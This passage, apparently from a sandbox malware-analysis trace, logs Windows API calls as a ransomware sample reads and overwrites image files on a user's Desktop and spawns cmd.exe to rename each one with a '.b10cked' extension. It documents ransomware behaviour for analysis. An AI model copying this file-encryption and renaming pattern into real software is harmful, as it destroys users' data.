lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4db8 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4db8 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x4db8 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4db8 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4db8 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.464] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4db8 [0219.464] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.464] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.464] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4db8 [0219.464] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.464] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.464] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4db8 [0219.464] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.464] SetFilePointer (in: 
hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.464] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4db8 [0219.464] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.464] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x48d0 [0219.464] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0219.465] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0219.465] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.465] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x4db8 [0219.465] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.465] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0219.465] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.465] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, 
dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x4db8 [0219.465] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.465] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.465] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x26db, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x26db, lpOverlapped=0x0) returned 1 [0219.465] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.466] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x26db, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x26db, lpOverlapped=0x0) returned 1 [0219.466] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-9947, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x26dd [0219.466] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x26db, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x26db, lpOverlapped=0x0) returned 1 [0219.466] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-9947, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x26dd [0219.466] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x26db, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x26db, lpOverlapped=0x0) returned 1 [0219.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="9CDgy bLN0e-uZnqSYBc.bmp", cchWideChar=24, 
lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0219.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="9CDgy bLN0e-uZnqSYBc.bmp", cchWideChar=24, lpMultiByteStr=0x132f7bc, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="9CDgy bLN0e-uZnqSYBc.bmp", lpUsedDefaultChar=0x0) returned 24 [0219.470] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x4db8 [0219.470] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0219.470] CloseHandle (hObject=0x1b4) returned 1 [0219.471] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\9CDGYB~1.BMP") returned 0x25 [0219.471] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0219.471] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\9CDGYB~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: 
lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\9CDGYB~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xe84, dwThreadId=0xfec)) returned 1 [0219.477] CloseHandle (hObject=0x120) returned 1 [0219.477] CloseHandle (hObject=0x1b4) returned 1 [0219.477] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.477] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.477] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 3 [0219.477] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.477] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.477] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0219.477] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.477] ReleaseMutex (hMutex=0xf8) returned 1 [0219.477] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.478] ReleaseMutex (hMutex=0xf8) returned 1 [0219.478] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.478] ReleaseMutex (hMutex=0xf8) returned 1 [0219.478] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.478] ReleaseMutex (hMutex=0xf8) returned 1 [0219.478] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png" (normalized: 
"c:\\users\\eebsym5\\desktop\\bcugg-6ytrmwdaph.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0219.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8199 [0219.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.478] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27626719013) returned 1 [0219.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8199 [0219.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8199 [0219.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x8199 [0219.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8199 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8199 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8199 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8199 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8199 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8199 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x7cb1 [0219.479] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0219.480] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0219.480] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.480] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x8199 [0219.480] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.480] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0219.480] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.480] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x8199 [0219.481] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.481] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.481] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x40cb, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x40cb, lpOverlapped=0x0) returned 1 [0219.481] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.481] WriteFile (in: hFile=0x1b4, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x40cb, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, 
lpNumberOfBytesWritten=0x12ec1c*=0x40cb, lpOverlapped=0x0) returned 1 [0219.481] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-16587, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x40ce [0219.481] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x40cb, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x40cb, lpOverlapped=0x0) returned 1 [0219.481] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-16587, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x40ce [0219.481] WriteFile (in: hFile=0x1b4, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x40cb, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x40cb, lpOverlapped=0x0) returned 1 [0219.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BcUgG-6ytRMwdapH.png", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0219.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BcUgG-6ytRMwdapH.png", cchWideChar=20, lpMultiByteStr=0x1328834, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BcUgG-6ytRMwdapH.png", lpUsedDefaultChar=0x0) returned 20 [0219.485] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x8199 [0219.485] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0219.626] CloseHandle (hObject=0x1b4) returned 1 [0219.627] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png", 
lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\BCUGG-~1.PNG") returned 0x25 [0219.627] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0219.627] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\BCUGG-~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\BCUGG-~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xea4, dwThreadId=0xd48)) returned 1 [0219.721] CloseHandle (hObject=0x120) returned 1 [0219.721] CloseHandle (hObject=0x1b4) returned 1 [0219.721] CharUpperBuffW 